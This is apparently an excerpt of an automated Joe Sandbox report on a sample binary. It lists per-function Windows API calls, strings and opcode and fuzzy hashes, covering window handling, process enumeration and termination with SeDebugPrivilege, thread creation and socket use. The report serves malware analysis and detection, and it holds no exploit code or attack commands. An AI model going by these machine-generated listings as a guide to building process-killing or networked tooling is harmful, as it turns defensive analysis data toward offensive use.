API String ID: 634782764-0
Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D

Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
DestroyIcon.USER32(00000000), ref: 0043C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
DestroyIcon.USER32(?), ref: 0043C3AB

Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68

Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24

Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
_wcscat.LIBCMT ref: 00486EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2

Strings

SysListView32, xrefs: 00486DF6

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68

Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
GetLastError.KERNEL32 ref: 0047E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
GetLastError.KERNEL32(00000000), ref: 0047EA6E
CloseHandle.KERNEL32(00000000), ref: 0047EAA3

Strings

SeDebugPrivilege, xrefs: 0047E9C2

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99

Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00463033

Strings

question, xrefs: 00462FEC
blank, xrefs: 00462FB5
warning, xrefs: 0046301C
stop, xrefs: 00463004
info, xrefs: 00462FD4

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE

Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
LoadStringW.USER32(00000000), ref: 00464319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
LoadStringW.USER32(00000000), ref: 00464336
_wprintf.LIBCMT ref: 0046435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00464357

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79

Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetSystemMetrics.USER32(0000000F), ref: 0048D47C
GetSystemMetrics.USER32(0000000F), ref: 0048D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
ShowWindow.USER32(00000003,00000000), ref: 0048D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54

Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D

Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
EnterCriticalSection.KERNEL32(?), ref: 00467130
_memmove.LIBCMT ref: 0046717E
_memmove.LIBCMT ref: 0046719B
LeaveCriticalSection.KERNEL32(?), ref: 004671AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 5c71d80941ca80f5ee531bff5a83870a479956e321588193e8cc6d96fef7cf6a
Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
Opcode Fuzzy Hash: 5c71d80941ca80f5ee531bff5a83870a479956e321588193e8cc6d96fef7cf6a
Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9

Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004861EB
GetDC.USER32(00000000), ref: 004861F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
ReleaseDC.USER32(00000000,00000000), ref: 0048620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68

Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

_wcstok.LIBCMT ref: 0046EC94
_wcscpy.LIBCMT ref: 0046ED23
_memset.LIBCMT ref: 0046ED56

Strings

X, xrefs: 0046ED93

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: d2c70786a1cc222465641166f330adecaf4d8f6fb7fd2aa8fbe6c6f5a27b1298
Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
Opcode Fuzzy Hash: d2c70786a1cc222465641166f330adecaf4d8f6fb7fd2aa8fbe6c6f5a27b1298
Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B

Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?), ref: 00476C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
WSAGetLastError.WSOCK32(00000000), ref: 00476C34
htons.WSOCK32(?), ref: 00476CEA
inet_ntoa.WSOCK32(?), ref: 00476CA7

Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815

_strlen.LIBCMT ref: 00476D44
_memmove.LIBCMT ref: 00476DAD

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 74bf75fca8117d4280a773217e344f06ef535c4d5ef814debfba2515503ad3c0
Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
Opcode Fuzzy Hash: 74bf75fca8117d4280a773217e344f06ef535c4d5ef814debfba2515503ad3c0
Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59

Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9

Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00D655A0), ref: 0048B3EB
IsWindowEnabled.USER32(00D655A0), ref: 0048B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
SendMessageW.USER32(00D655A0,000000B0,?,?), ref: 0048B512
IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
GetWindowLongW.USER32(00D655A0,000000EC), ref: 0048B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
